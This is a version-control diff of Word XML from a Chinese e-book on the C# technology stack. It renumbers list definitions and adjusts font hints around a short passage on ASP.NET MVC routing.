     <w:tmpl w:val="5A4FAB1A"/>
@@ -58897,7 +59545,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="49">
+  <w:abstractNum w:abstractNumId="50">
     <w:nsid w:val="5D443934"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="57E8B89E"/>
@@ -58986,7 +59634,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="50">
+  <w:abstractNum w:abstractNumId="51">
     <w:nsid w:val="61471FB5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="26087042"/>
@@ -59075,7 +59723,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="51">
+  <w:abstractNum w:abstractNumId="52">
     <w:nsid w:val="639186A0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="639186A0"/>
@@ -59224,7 +59872,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="52">
+  <w:abstractNum w:abstractNumId="53">
     <w:nsid w:val="653D1365"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5DC48D9E"/>
@@ -59373,7 +60021,93 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="53">
+  <w:abstractNum w:abstractNumId="54">
+    <w:nsid w:val="69314723"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="A448EC52"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="55">
     <w:nsid w:val="6A042BEB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="6A042BEB"/>
@@ -59522,7 +60256,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="54">
+  <w:abstractNum w:abstractNumId="56">
     <w:nsid w:val="6C7508CD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="980A5440"/>
@@ -59671,7 +60405,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="55">
+  <w:abstractNum w:abstractNumId="57">
     <w:nsid w:val="6DEB2301"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="348AF822"/>
@@ -59816,7 +60550,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="56">
+  <w:abstractNum w:abstractNumId="58">
     <w:nsid w:val="7A1CE74A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7A1CE74A"/>
@@ -59965,7 +60699,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="57">
+  <w:abstractNum w:abstractNumId="59">
     <w:nsid w:val="7BAD69E7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F4727B6E"/>
@@ -60055,7 +60789,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="58">
+  <w:abstractNum w:abstractNumId="60">
     <w:nsid w:val="7E1D9B84"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7E1D9B84"/>
@@ -60204,7 +60938,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="59">
+  <w:abstractNum w:abstractNumId="61">
     <w:nsid w:val="7FFE1E02"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7FFE1E02"/>
@@ -60363,7 +61097,7 @@
     <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="53"/>
+    <w:abstractNumId w:val="55"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="32"/>
@@ -60378,7 +61112,7 @@
     <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="58"/>
+    <w:abstractNumId w:val="60"/>
   </w:num>
   <w:num w:numId="10">
     <w:abstractNumId w:val="6"/>
@@ -60537,7 +61271,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="43"/>
+    <w:abstractNumId w:val="44"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="19"/>
@@ -61245,13 +61979,13 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="46">
-    <w:abstractNumId w:val="37"/>
+    <w:abstractNumId w:val="38"/>
   </w:num>
   <w:num w:numId="47">
-    <w:abstractNumId w:val="38"/>
+    <w:abstractNumId w:val="39"/>
   </w:num>
   <w:num w:numId="48">
-    <w:abstractNumId w:val="59"/>
+    <w:abstractNumId w:val="61"/>
   </w:num>
   <w:num w:numId="49">
     <w:abstractNumId w:val="3"/>
@@ -61740,10 +62474,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="67">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
   </w:num>
   <w:num w:numId="68">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -61773,7 +62507,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="69">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -61803,7 +62537,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="70">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -61833,7 +62567,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="71">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -61863,7 +62597,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="72">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -61893,7 +62627,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="73">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -61923,7 +62657,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="74">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -61953,7 +62687,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="75">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -61983,7 +62717,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="76">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62013,7 +62747,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="77">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62043,7 +62777,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="78">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62073,7 +62807,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="79">
-    <w:abstractNumId w:val="39"/>
+    <w:abstractNumId w:val="40"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62103,10 +62837,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="80">
-    <w:abstractNumId w:val="36"/>
+    <w:abstractNumId w:val="37"/>
   </w:num>
   <w:num w:numId="81">
-    <w:abstractNumId w:val="36"/>
+    <w:abstractNumId w:val="37"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62292,10 +63026,10 @@
     <w:abstractNumId w:val="33"/>
   </w:num>
   <w:num w:numId="89">
-    <w:abstractNumId w:val="51"/>
+    <w:abstractNumId w:val="52"/>
   </w:num>
   <w:num w:numId="90">
-    <w:abstractNumId w:val="51"/>
+    <w:abstractNumId w:val="52"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62325,7 +63059,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="91">
-    <w:abstractNumId w:val="51"/>
+    <w:abstractNumId w:val="52"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62355,10 +63089,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="92">
-    <w:abstractNumId w:val="40"/>
+    <w:abstractNumId w:val="41"/>
   </w:num>
   <w:num w:numId="93">
-    <w:abstractNumId w:val="40"/>
+    <w:abstractNumId w:val="41"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62388,7 +63122,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="94">
-    <w:abstractNumId w:val="40"/>
+    <w:abstractNumId w:val="41"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62883,10 +63617,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="115">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
   </w:num>
   <w:num w:numId="116">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62916,7 +63650,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="117">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62946,7 +63680,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="118">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -62976,7 +63710,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="119">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63006,7 +63740,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="120">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63036,7 +63770,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="121">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63066,7 +63800,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="122">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63096,7 +63830,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="123">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63126,7 +63860,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="124">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="49"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63156,10 +63890,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="125">
-    <w:abstractNumId w:val="41"/>
+    <w:abstractNumId w:val="42"/>
   </w:num>
   <w:num w:numId="126">
-    <w:abstractNumId w:val="41"/>
+    <w:abstractNumId w:val="42"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63189,7 +63923,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="127">
-    <w:abstractNumId w:val="41"/>
+    <w:abstractNumId w:val="42"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63219,7 +63953,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="128">
-    <w:abstractNumId w:val="41"/>
+    <w:abstractNumId w:val="42"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63249,7 +63983,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="129">
-    <w:abstractNumId w:val="41"/>
+    <w:abstractNumId w:val="42"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63279,7 +64013,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="130">
-    <w:abstractNumId w:val="41"/>
+    <w:abstractNumId w:val="42"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63591,10 +64325,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="144">
-    <w:abstractNumId w:val="44"/>
+    <w:abstractNumId w:val="45"/>
   </w:num>
   <w:num w:numId="145">
-    <w:abstractNumId w:val="44"/>
+    <w:abstractNumId w:val="45"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -63933,28 +64667,28 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="159">
-    <w:abstractNumId w:val="56"/>
+    <w:abstractNumId w:val="58"/>
   </w:num>
   <w:num w:numId="160">
-    <w:abstractNumId w:val="35"/>
+    <w:abstractNumId w:val="36"/>
   </w:num>
   <w:num w:numId="161">
-    <w:abstractNumId w:val="52"/>
+    <w:abstractNumId w:val="53"/>
   </w:num>
   <w:num w:numId="162">
-    <w:abstractNumId w:val="57"/>
+    <w:abstractNumId w:val="59"/>
   </w:num>
   <w:num w:numId="163">
-    <w:abstractNumId w:val="49"/>
+    <w:abstractNumId w:val="50"/>
   </w:num>
   <w:num w:numId="164">
+    <w:abstractNumId w:val="47"/>
+  </w:num>
+  <w:num w:numId="165">
     <w:abstractNumId w:val="46"/>
   </w:num>
-  <w:num w:numId="165">
-    <w:abstractNumId w:val="45"/>
-  </w:num>
   <w:num w:numId="166">
-    <w:abstractNumId w:val="47"/>
+    <w:abstractNumId w:val="48"/>
   </w:num>
   <w:num w:numId="167">
     <w:abstractNumId w:val="31"/>
@@ -63969,19 +64703,25 @@
     <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="171">
-    <w:abstractNumId w:val="55"/>
+    <w:abstractNumId w:val="57"/>
   </w:num>
   <w:num w:numId="172">
-    <w:abstractNumId w:val="54"/>
+    <w:abstractNumId w:val="56"/>
   </w:num>
   <w:num w:numId="173">
-    <w:abstractNumId w:val="50"/>
+    <w:abstractNumId w:val="51"/>
   </w:num>
   <w:num w:numId="174">
     <w:abstractNumId w:val="34"/>
   </w:num>
   <w:num w:numId="175">
-    <w:abstractNumId w:val="42"/>
+    <w:abstractNumId w:val="43"/>
+  </w:num>
+  <w:num w:numId="176">
+    <w:abstractNumId w:val="35"/>
+  </w:num>
+  <w:num w:numId="177">
+    <w:abstractNumId w:val="54"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="172"/>
 </w:numbering>
@@ -64860,7 +65600,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7CB407D4-A842-4978-B71D-C122D65B6373}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{97B6CA9A-0D6A-4516-8045-D1187D994CA0}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -2327,9 +2327,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -2338,9 +2335,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -2349,9 +2343,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -2360,9 +2351,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -2371,9 +2359,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -2382,9 +2367,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -2393,9 +2375,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -2404,9 +2383,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="720"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -12070,29 +12046,29 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>对于传统的ASP.NET WebForms应用来说，用户请求总是指向某个具体的物理文件，</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>对于传统的ASP.NET WebForms应用来说，用户请求总是指向某个具体的物理文件，</w:t>
+        <w:t>目标文件的路径决定了访问请求的URL</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>目标文件的路径决定了访问请求的URL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:t>。但是对于ASP.NET MVC应用来说，来自浏览器的请求总是来自某个Controller中的某个Action，请求URL与目标Controller/Action之间的映射是通过“路由”来实现的。</w:t>
       </w:r>
     </w:p>
@@ -12100,7 +12076,7 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -12129,9 +12105,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12178,7 +12151,7 @@
           <w:numId w:val="177"/>
         </w:numPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -12250,7 +12223,7 @@
           <w:numId w:val="177"/>
         </w:numPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -12278,7 +12251,7 @@
           <w:numId w:val="177"/>
         </w:numPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -12302,7 +12275,7 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -12312,7 +12285,7 @@
         <w:pStyle w:val="10"/>
         <w:ind w:firstLine="420"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -12367,7 +12340,7 @@
         <w:pStyle w:val="10"/>
         <w:ind w:firstLine="420"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -12391,7 +12364,7 @@
         <w:pStyle w:val="10"/>
         <w:ind w:firstLine="420"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -12401,7 +12374,7 @@
         <w:pStyle w:val="10"/>
         <w:ind w:firstLine="420"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -12441,7 +12414,7 @@
         <w:ind w:firstLine="420"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:b/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -12506,7 +12479,7 @@
         <w:ind w:firstLine="420"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:b/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -25979,6 +25952,29 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
           <w:sz w:val="22"/>
